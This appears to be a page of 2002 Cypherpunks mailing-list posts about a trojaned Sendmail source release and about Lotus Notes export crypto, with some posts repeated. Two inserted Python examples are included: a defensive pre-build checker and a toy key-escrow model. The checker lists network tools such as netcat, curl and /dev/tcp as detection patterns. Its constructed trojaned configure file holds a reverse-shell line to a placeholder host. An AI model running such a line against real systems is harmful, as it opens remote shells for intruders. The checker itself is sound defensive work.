Re: Trojan-modified Sendmail floating around - 8.12.6 - Since Sept. 28th or earlier.
On Wed, Oct 09, 2002 at 11:01:21PM +0100, Ben Laurie wrote:
> Bill Stewart wrote:
> > Somebody backdoored the source code for Sendmail on the official server.
> > So if you recompile from scratch, your sendmail is 0wned.
> > Another reason not to run mail systems as root
>
> In this case, as I understand it, it bites when you compile.

Running 'configure' has always made me nervous. It's a little difficult to read for exploit code.

So, it's another reason not to build them as root.

"But you're _supposed to_ run rpm -b as root!" -- someone who should know better, since I'd just spent an hour explaining what to look for to see if his install of sendmail had gotten him 0wned. Sigh.

Eric
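The three practical points in this exchange (don't build as root, check the archive against a hash you got through a channel other than the download server, and actually read the build scripts before running them) as a pre-build check. This is an added example, not code from the thread or from the Sendmail project. The two tarballs, the file names under sendmail-8.12.6/, the "pinned" hash and the pattern list are all constructed or assumed here so the script runs offline; the patterns are a rough heuristic for a build script that phones home, not a signature for the real 8.12.6 trojan.

```python
"""Pre-build checks for a downloaded source tarball (added example).

Refuse to unpack or build as root, compare the archive against a hash
obtained out of band (for a 2002 release, the PGP-signed announcement),
and skim the build scripts for network activity, since a trojan that fires
during configure or make has to reach out somehow.  Everything below the
function definitions is constructed sample input, not Sendmail source.
"""
import hashlib
import hmac
import io
import os
import re
import tarfile

# Files whose contents run at build time and deserve a look before 'make'.
BUILD_SCRIPT = re.compile(r"(^|/)(configure|Makefile(\.m4)?|[^/]*\.(sh|m4))$")

# Things a configure script or Makefile has no business doing.
# Heuristic list, an assumption of this example.
NETWORK_PATTERNS = [
    r"/dev/tcp/",                        # bash's built-in TCP client
    r"\b(nc|netcat|telnet|wget|curl|ftp)\b",
    r"\b(socket|connect|sendto)\s*\(",   # inline C that dials out
]


def effective_uid():
    """-1 where the platform has no uids (Windows), else the effective uid."""
    return getattr(os, "geteuid", lambda: -1)()


def verify_pinned_hash(tarball, pinned_sha256_hex):
    """True only if the archive matches the hash from a trusted channel."""
    digest = hashlib.sha256(tarball).hexdigest()
    return hmac.compare_digest(digest, pinned_sha256_hex)


def suspicious_build_members(tarball):
    """Map build-script name -> patterns it matched, for scripts in the tar."""
    findings = {}
    with tarfile.open(fileobj=io.BytesIO(tarball), mode="r:*") as tf:
        for member in tf.getmembers():
            if not member.isfile() or not BUILD_SCRIPT.search(member.name):
                continue
            text = tf.extractfile(member).read().decode("utf-8", "replace")
            hits = [p for p in NETWORK_PATTERNS if re.search(p, text)]
            if hits:
                findings[member.name] = hits
    return findings


def preflight(tarball, pinned_sha256_hex, euid=None):
    """Return the list of reasons not to build; an empty list means go ahead."""
    euid = effective_uid() if euid is None else euid
    problems = []
    if euid == 0:
        problems.append("running as root: unpack and build as an unprivileged user")
    if not verify_pinned_hash(tarball, pinned_sha256_hex):
        problems.append("sha256 does not match the pinned value: archive replaced or corrupted")
    for name, hits in suspicious_build_members(tarball).items():
        problems.append("%s matches %s: read it before running it" % (name, ", ".join(hits)))
    return problems


def make_tarball(files):
    """Build an uncompressed tar in memory from {name: bytes} (constructed input)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed stand-ins: a clean tree, and the same tree with a dial-out
# spliced into configure.  Neither is real Sendmail source.
CLEAN_TREE = {
    "sendmail-8.12.6/configure": b"#!/bin/sh\necho checking for cc...\n",
    "sendmail-8.12.6/Makefile": b"all:\n\tcc -o sendmail main.c\n",
    "sendmail-8.12.6/main.c": b"int main(void) { return 0; }\n",
}
TROJANED_TREE = dict(CLEAN_TREE)
TROJANED_TREE["sendmail-8.12.6/configure"] = (
    b"#!/bin/sh\necho checking for cc...\n"
    b"(exec 3<>/dev/tcp/example.invalid/1234 && sh <&3 >&3 2>&1) &\n"
)
CLEAN_TARBALL = make_tarball(CLEAN_TREE)
TROJANED_TARBALL = make_tarball(TROJANED_TREE)

# Assumption: in practice this value comes from the signed release
# announcement, never from the same server that served the tarball.
PINNED_SHA256 = hashlib.sha256(CLEAN_TARBALL).hexdigest()

if __name__ == "__main__":
    for label, tb in (("clean", CLEAN_TARBALL), ("trojaned", TROJANED_TARBALL)):
        print(label, preflight(tb, PINNED_SHA256) or ["ok to build"])
```

Run as a normal user it reports the clean tree as buildable and flags the trojaned one twice (hash mismatch, and the /dev/tcp/ line in configure); run as root it refuses both. The grep is the weakest part, which is the point the thread makes: a configure script is hard to read for exploit code, so the out-of-band hash and the unprivileged build account are the controls to rely on.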
Re: Echelon-like...
> > I assume everyone knows the little arrangement that Lotus reached with the NSA over its encrypted secure email?
> I'm new here, so do tell if I am wrong. Are you referring to the two levels of Encryption available in Bogus Notes?

More or less, yes. Lotus knew nobody would buy a 40 bit version of their crypto, so there is a two-level encryption all right, but not along those lines - in the export version, some of the session key is encrypted using a PKI work reduction factor key in the message header; this section of header is important, as Lotus gateways won't accept messages that have had it disturbed. By decoding this block, the NSA have the actual keysize they need to break reduced to the legal export level of 40 bits; one government found this out *after* rolling it out to all their billing and contract negotiation departments... Belgium or Sweden, by memory. Lotus thought it would be ok if only the NSA (and other US government orgs) could break the key, rather than letting everyone have an equal chance (and indeed, letting their customers know their crypto was still only 40 bit vs USA intel agencies).

> Still, even the domestic version was only 64 bits, which is painfully small even by the standards of the day.

Certainly, even strong Lotus could have been crackable by the NSA, who after all own their own fab plant to make custom VLSI cracking chips.
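A scaled-down model of the workfactor reduction described in this message, added here as an example; it is not Lotus code and does not claim to reproduce the real header layout. The 64-bit key and the 40-bit residual search are the thread's figures; the 24 disclosed bits follow from them. The XOR stand-in for the header encryption, the "tag" used to recognise the right key, and the 16-bit toy key for the timed brute force are assumptions of the example.

```python
"""Toy model of a 'workfactor reduction' header (added example).

A 64-bit bulk key is used for the message, but the top bits of that key
are shipped in the header encrypted to one party's key.  That party opens
the header and searches 2^40; everyone else searches 2^64.  The header
'encryption' below is a stand-in XOR (the product used public-key crypto),
and the brute force runs on a 16-bit key so it finishes in seconds.
"""
import hashlib

# Figures from the thread; the number of bits given away follows from them.
KEY_BITS = 64
DISCLOSED_BITS = KEY_BITS - 40


def effective_search_bits(key_bits, disclosed_bits, holds_header_key):
    """Bits an attacker must still enumerate exhaustively."""
    return key_bits - disclosed_bits if holds_header_key else key_bits


def key_tag(key, key_bits):
    """Stand-in for 'decrypt and see whether the plaintext makes sense':
    something the attacker can compute for a candidate key and compare."""
    width = (key_bits + 7) // 8
    return hashlib.sha256(b"toy-notes-msg:" + key.to_bytes(width, "big")).digest()[:8]


def build_header(session_key, key_bits, disclosed_bits, header_key):
    """Ship the top `disclosed_bits` of the session key, encrypted to the
    header-key holder (toy cipher: XOR with the holder's secret)."""
    mask = (1 << disclosed_bits) - 1
    fragment = session_key >> (key_bits - disclosed_bits)
    return fragment ^ (header_key & mask)


def open_header(header, disclosed_bits, header_key):
    """What the header-key holder learns: the disclosed top bits of the key."""
    return header ^ (header_key & ((1 << disclosed_bits) - 1))


def brute_force(target_tag, key_bits, disclosed_bits=0, known_fragment=None):
    """Search for the key behind target_tag.  With the header opened, the top
    bits are fixed and only the remainder is enumerated.  Returns (key, trials)."""
    if known_fragment is None:
        prefix, unknown_bits = 0, key_bits
    else:
        unknown_bits = key_bits - disclosed_bits
        prefix = known_fragment << unknown_bits
    trials = 0
    for low in range(1 << unknown_bits):
        trials += 1
        candidate = prefix | low
        if key_tag(candidate, key_bits) == target_tag:
            return candidate, trials
    return None, trials


def compare_attackers(session_key, header_key, key_bits=16, disclosed_bits=8):
    """Run both attacks on a scaled-down key (16 bits with 8 disclosed is an
    assumption chosen so the full search stays cheap).  Returns
    (key found with the header key, trials, key found without it, trials)."""
    tag = key_tag(session_key, key_bits)
    header = build_header(session_key, key_bits, disclosed_bits, header_key)
    fragment = open_header(header, disclosed_bits, header_key)
    with_key, with_trials = brute_force(tag, key_bits, disclosed_bits, fragment)
    without_key, without_trials = brute_force(tag, key_bits)
    return with_key, with_trials, without_key, without_trials


if __name__ == "__main__":
    print("export key:", KEY_BITS, "bits; holder of the header key searches",
          effective_search_bits(KEY_BITS, DISCLOSED_BITS, True), "bits")
    print(compare_attackers(0xBEEF, 0x5A))
```

With the constructed key 0xBEEF the header holder finds it in 240 trials and everyone else in 48,880, the same 2^8 versus 2^16 ratio that 2^40 versus 2^64 gives at full size. Nothing about the ciphertext looks different to the two attackers; the whole asymmetry lives in who can open the header, which is why a gateway that rejects messages with a disturbed header matters as much as the field itself.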
Re: Echelon-like...
B

--Kaos-Keraunos-Kybernetos--
NSA got $20Bil/year and didn't stop 9-11. Instead of rewarding their failures, we should get refunds!
Passwords are like underwear. You don't share them, you don't hang them on your monitor, or under your keyboard, you don't email them, or put them on a web site, and you must change them very often.
[EMAIL PROTECTED] http://www.sunder.net

On 10 Oct 2002, anonimo arancio wrote:
> This relates to an issue I've wanted to discuss with Cypherpunks for several years. Over the years, I've seen several commentators (including Timothy May) appear surprised when discussing the US's encryption export policies. The basic argument is that, if good encryption is available overseas or easily downloadable, it doesn't make sense to make export of it illegal.
>
> Is the above statement a) wrong, b) obvious, c) mentioned previously on the cypherpunks boards, or d) hey! We never thought of that
Re: Echelon-like...
> I assume everyone knows the little arrangement that lotus reached with the NSA over its encrypted secure email?

I'm new here, so do tell if I am wrong. Are you referring to the two levels of Encryption available in Bogus Notes? (i.e., the North American and the International, the International being legal for export.) At one of my previous employers, we were told the (apocryphal?) story of some dude who got arrested on an airplane for having the more secure version of Notes on his laptop.

From: David Howe [EMAIL PROTECTED]
To: Email List: Cypherpunks [EMAIL PROTECTED]
Subject: Re: Echelon-like...
Date: Thu, 10 Oct 2002 18:38:36 +0100

On Wednesday, October 9, 2002, at 07:28 PM, anonimo arancio wrote:
> The basic argument is that, if good encryption is available overseas or easily downloadable, it doesn't make sense to make export of it illegal.

Nope. The biggest name in software right now is Microsoft, who wasn't willing to face down the government on this. No export version of a Microsoft product had decent crypto while the export regulations were in force - and the situation is pretty poor even now. If Microsoft were free to compete in this area (and Lotus, of Notes fame) then there would be decent security *built into* the operating system, the desktop document suite or the email package - and life would get a lot, lot worse for the spooks.

I assume everyone knows the little arrangement that Lotus reached with the NSA over its encrypted secure email?
Re: Echelon-like...
On Wednesday, October 9, 2002, at 07:28 PM, anonimo arancio wrote:
> The basic argument is that, if good encryption is available overseas or easily downloadable, it doesn't make sense to make export of it illegal.

Nope. The biggest name in software right now is Microsoft, who wasn't willing to face down the government on this. No export version of a Microsoft product had decent crypto while the export regulations were in force - and the situation is pretty poor even now. If Microsoft were free to compete in this area (and Lotus, of Notes fame) then there would be decent security *built into* the operating system, the desktop document suite or the email package - and life would get a lot, lot worse for the spooks.

I assume everyone knows the little arrangement that Lotus reached with the NSA over its encrypted secure email?
Re: Echelon-like...
On Thu, Oct 10, 2002 at 02:28:26AM -, anonimo arancio wrote:
[..]
> But I am wondering if Cypherpunks have mentioned the 'obvious'. The government knows exactly what it's doing. It wants to discourage the use of encryption by any means necessary, because of sheer numbers. Basically, the more messages that are encrypted, the more hardware (and therefore $$$) will be needed to decrypt them. Therefore, the only way they can stay ahead of the game is to keep the numbers as low as possible, so they can continue to outspend the problem. This is, from their perspective, a perfectly reasonable approach to decrypting large numbers of messages, a small fraction of which may contain interesting information.
>
> Is the above statement a) wrong, b) obvious, c) mentioned previously on the cypherpunks boards, or d) hey! We never thought of that

B and C, extensively.

The US Government has pretty much given up on restricting crypto exports. There is just enough of a vestigial restriction there to maintain the illusion that the government has a right to control crypto exports. If there was anything more, it would be challenged in court and most likely get thrown out. The government backed off on previous challenges (Bernstein, Zimmerman) to avoid that.

Eric
Re: Echelon-like...
Not only is EM correct, but:

* many attacks are possible without worrying about keylength. Got Scarfo?
* NIST/NSA picked the lamest AES. If I told you what lame meant, I'd have to kill you.
* (Lack of) User motivation (related to man-machine issues) is still the spooks' best friend. As well as legacy systems, and inadequately designed total systems. Got Redmond?

However, stego and decent opsec and cash and leo buffoonery still let you coordinate the occasional urban skyline reconstruction, poking holes in boats, etc. Got Dead Drops? Mr. Hanssen? Mr. Ames?

At 08:09 AM 10/10/02 -0700, Eric Murray wrote:
> On Thu, Oct 10, 2002 at 02:28:26AM -, anonimo arancio wrote:
> > The government knows exactly what it's doing. It wants to discourage the use of encryption by any means necessary, because of sheer numbers. Basically, the more messages that are encrypted, the more hardware (and therefore $$$) will be needed to decrypt them. Therefore, the only way they can stay ahead of the game is to keep the numbers as low as possible, so they can continue to outspend the problem. This is, from their perspective, a perfectly reasonable approach to decrypting large numbers of messages, a small fraction of which may contain interesting information.
> >
> > Is the above statement a) wrong, b) obvious, c) mentioned previously on the cypherpunks boards, or d) hey! We never thought of that
>
> B and C, extensively.
>
> The US Government has pretty much given up on restricting crypto exports. There is just enough of a vestigial restriction there to maintain the illusion that the government has a right to control crypto exports. If there was anything more, it would be challenged in court and most likely get thrown out. The government backed off on previous challenges (Bernstein, Zimmerman) to avoid that.
>
> Eric
Re: Echelon-like...
hi,

> The government knows exactly what it's doing. It wants to discourage the use of encryption by any means necessary, because of sheer numbers.

Doesn't govt intervention always increase the numbers?

> Basically, the more messages that are encrypted, the more hardware (and therefore $$$) will be needed to decrypt them. Therefore, the only way they can stay ahead of the game is to keep the numbers as low as possible, so they can continue to outspend the problem.

Why don't we have encrypted spams over the internet rather than plain text spam? That's one way we can all benefit from spam.

> The US Government has pretty much given up on restricting crypto exports.

Why did that happen?

Regards
Sarath.